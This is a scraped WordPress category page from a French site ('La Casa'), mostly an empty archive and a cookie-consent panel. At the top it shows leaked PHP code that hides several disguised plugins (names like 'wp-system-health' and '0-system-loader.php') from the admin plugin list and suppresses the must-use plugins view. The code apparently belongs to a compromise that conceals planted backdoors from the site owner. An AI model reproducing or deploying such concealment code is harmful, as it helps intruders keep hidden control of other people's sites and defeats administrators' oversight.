add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); Archives des Non classé - La Casa
Category

Non classé

Apologies, but no results were found. Perhaps searching will help find a related post.

Privacy Settings
We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
Youtube
Consent to display content from - Youtube
Vimeo
Consent to display content from - Vimeo
Google Maps
Consent to display content from - Google
Spotify
Consent to display content from - Spotify
Sound Cloud
Consent to display content from - Sound